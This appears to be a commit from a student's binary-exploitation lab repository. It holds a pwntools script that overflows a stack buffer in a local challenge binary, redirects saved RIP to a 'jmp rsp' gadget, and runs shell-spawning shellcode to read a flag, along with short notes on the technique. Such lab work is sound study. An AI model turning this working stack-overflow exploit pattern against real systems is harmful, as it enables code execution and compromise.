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lab 4b.3 - some more shellcode
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4b/lab4b_3.py
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64
4b/lab4b_3.py
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#!/usr/bin/env python3
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# -*- coding: utf-8 -*-
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# This exploit template was generated via:
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# $ pwn template /challenge/run
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from pwn import *
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# Set up pwntools for the correct architecture
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exe = context.binary = ELF(args.EXE or "/challenge/run")
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# Many built-in settings can be controlled on the command-line and show up
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# in "args". For example, to dump all data sent/received, and disable ASLR
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# for all created processes...
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# ./exploit.py DEBUG NOASLR
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def start(argv=[], *a, **kw):
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"""Start the exploit against the target."""
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if args.GDB:
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return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
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else:
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return process([exe.path] + argv, *a, **kw)
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# Specify your GDB script here for debugging
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# GDB will be launched if the exploit is run via e.g.
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# ./exploit.py GDB
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gdbscript = """
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b vuln
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continue
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""".format(
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**locals()
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)
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# ===========================================================
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# EXPLOIT GOES HERE
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# ===========================================================
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# Arch: amd64-64-little
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# RELRO: No RELRO
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# Stack: No canary found
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# NX: NX unknown - GNU_STACK missing
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# PIE: No PIE (0x400000)
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# Stack: Executable
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# RWX: Has RWX segments
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io = start()
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target_fn = 0x401146
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unbound_buffer = 0x7FFDE3E76C00
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saved_rip = 0x7FFDE3E76C48
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offset = saved_rip - unbound_buffer
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payload_padding = b"F" * offset # pad until saved_rip
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payload_rip = p64(target_fn) # in this challenge, we target the jmp rsp code
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payload_shellcode = asm(shellcraft.sh()) # from pwn
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payload = payload_padding + payload_rip + payload_shellcode + b"\n"
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io.send(payload)
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print("[>>>] Sending payload...")
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# root shell gained
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io.send(b"cat /flag \n")
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io.interactive()
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@ -479,3 +479,15 @@ done
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- even more direct access - no addition of address, just direct address control (lol)
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- even more direct access - no addition of address, just direct address control (lol)
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- set flag to `0xdeadfeed`
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- set flag to `0xdeadfeed`
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### lab 4b.3 - overflow + a defense
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- similar to 4b.1 and 4b.2
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- but here we dont have RSP so we cant point RIP to it
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- instead there's a function that has `jmp *%rsp`
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- so first, pad the vulnerable stack buffer upto the saved RIP's address
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- put that function's address in it
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- now, remember that when a function returns, it pops its stack
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- so we need to put our shellcode after this saved RIP's location
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- that way, when the current function returns into the target function, the target function's RSP will point to the shellcode
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- boom
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